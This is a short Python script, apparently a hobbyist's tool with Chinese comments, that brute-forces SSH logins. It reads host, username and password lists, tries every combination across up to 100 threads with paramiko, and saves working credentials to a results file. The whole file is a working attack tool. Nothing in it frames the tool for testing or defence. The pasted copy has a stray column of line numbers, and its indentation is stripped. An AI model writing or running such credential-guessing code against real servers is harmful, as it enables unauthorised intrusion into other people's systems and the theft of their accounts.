1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
| #!usr/bin/env python
#!coding=utf-8
__author__='Akkuman'
'''
SSH爆破,由于多线程的问题,我不知道怎么做可以出现结果马上停止(会查的,有更好的方法再改)
现在我的方法是定义了一个全局的信号finish_flag,然后每个线程检查这个信号
线程池用的concurrent.futures.ThreadPoolExecutor,是Py3的特性,py2需要安装其他的包
成功结果写到了result.txt,可以通过检查目录下的result.txt文件查看结果
'''
import paramiko
from concurrent.futures import ThreadPoolExecutor
import sys
finish_flag = False
def connect(host,user,pwd):
global finish_flag
if finish_flag:
sys.exit()
try:
ssh=paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=host,username=user,password=pwd)
print ("[-]Login Succ u:%s p:%s h:%s"%(user,pwd,host))
with open('result.txt','a+') as f:
f.write("h:%s u:%s p:%s\n"%(host,user,pwd))
finish_flag = True
except paramiko.ssh_exception.SSHException as err:
print("[x]Login Fail u:%s p:%s"%(user,pwd))
finally:
ssh.close()
return
# 取得一个hostip,username,password
def getInfo():
# 遍历ip
with open('host.txt') as hosts:
for host in hosts:
hostip = host.strip()
print("[x]Target:"+host)
# 遍历用户名
with open('user.txt') as users:
for user in users:
username = user.strip()
# 遍历密码
with open('pwd.txt') as pwds:
for pwd in pwds:
password = pwd.strip()
yield hostip,username,password
def main():
paramiko.util.log_to_file("filename.log")
info = getInfo()
# 最大线程数
max_thread_num = 100
executor = ThreadPoolExecutor(max_workers=max_thread_num)
for host,user,pwd in info:
future = executor.submit(connect,host,user,pwd)
if __name__ == '__main__':
main()
|